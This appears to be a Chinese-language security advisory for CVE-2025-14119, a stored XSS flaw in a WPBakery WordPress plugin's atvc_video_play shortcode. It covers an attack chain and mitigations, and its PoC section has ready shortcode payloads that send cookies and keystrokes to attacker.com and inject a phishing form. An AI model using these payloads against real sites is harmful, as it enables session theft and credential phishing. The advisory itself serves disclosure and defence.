CVE-2025-14119 WordPress WPBakery页面构建器插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14119

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

App Landing Template Blocks for WPBakery (Visual Composer) Page Builder

漏洞概述

CVE-2025-14119是WordPress平台上一款名为"App Landing Template Blocks for WPBakery Page Builder"插件的安全漏洞。该插件用于在WordPress网站中创建App落地页模板，集成于WPBakery（Visual Composer）页面构建器中。漏洞源于插件的'atvc_video_play'短代码功能对用户输入的属性参数缺乏充分的输入验证和输出转义处理。攻击者利用此漏洞可以注入恶意JavaScript代码，这些代码会被永久存储在受影响的WordPress页面中。当其他用户访问包含恶意代码的页面时，注入的脚本将自动执行，可能导致会话劫持、敏感信息窃取、恶意重定向等安全问题。由于该漏洞为存储型XSS，攻击成功后影响范围持久且传播广泛，对网站访问者构成持续性威胁。

技术细节

该漏洞位于插件的modules/video-play.php文件第58行附近，漏洞根源在于短代码处理器未对atvc_video_play短代码的用户可控属性进行安全过滤。攻击者只需拥有WordPress网站的contributor（贡献者）角色或更高权限，即可通过添加或编辑页面时插入恶意构造的短代码。例如，攻击者可在页面内容中插入包含恶意脚本的shortcode属性，当页面被保存和访问时，恶意JavaScript代码会被浏览器解析执行。由于WordPress的权限模型中contributor角色具有创建和编辑草稿文章的权限，攻击门槛相对较低。存储型XSS的危害在于恶意代码会随页面内容永久存储，任何访问该页面的用户都会触发攻击，包括管理员在内的高权限用户也无法幸免。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网站使用的WordPress版本和App Landing Template Blocks for WPBakery插件版本

STEP 2

2. 权限获取

攻击者获取WordPress网站的contributor或更高权限账户，可通过社会工程、弱密码或漏洞利用实现

STEP 3

3. 恶意代码注入

攻击者在页面编辑界面通过atvc_video_play短代码注入包含恶意JavaScript的属性参数

STEP 4

4. 页面保存发布

包含恶意代码的页面被保存并发布，XSS payload永久存储在数据库中

STEP 5

5. 用户访问触发

普通用户或管理员访问被注入的页面时，恶意JavaScript在受害者浏览器中自动执行

STEP 6

6. 攻击完成

攻击者通过XSS获取用户会话Cookie、窃取敏感信息或执行进一步的攻击操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-14119 PoC - Stored XSS via atvc_video_play shortcode -->
<!-- Requires contributor-level access or higher on WordPress site -->
<!-- Attack vector: Inject malicious JavaScript through shortcode attributes -->

<!-- Basic PoC - Inject alert with cookie stealing -->
[atvc_video_play video_url='https://example.com/video.mp4' onmouseover='alert(document.cookie)']

<!-- Advanced PoC - Session hijacking -->
[atvc_video_play video_url='x' onmouseover='fetch("https://attacker.com/steal?c="+document.cookie)']

<!-- PoC - Keylogger -->
[atvc_video_play video_url='x' onfocus='document.addEventListener("keypress",function(e){fetch("https://attacker.com/log?k="+e.key)})']

<!-- PoC - DOM manipulation for phishing -->
[atvc_video_play video_url='x' onload='document.body.innerHTML="<h1>Phishing Page</h1><form action='https://attacker.com/phish'><input name='pwd'><button>Login</button></form>"']

影响范围

App Landing Template Blocks for WPBakery Page Builder <= 2.0.2

防御指南

临时缓解措施

在官方安全补丁发布前，可采取以下临时缓解措施：1) 使用Web应用防火墙(WAF)规则阻止包含可疑短代码属性的请求；2) 禁用或限制contributor角色的文章发布权限；3) 通过.htaccess或Nginx配置添加XSS防护规则；4) 使用WordPress安全插件监控和阻止恶意短代码注入；5) 考虑临时禁用受影响的插件并寻找替代方案；6) 加强用户认证机制，启用双因素认证以防止账户被劫持。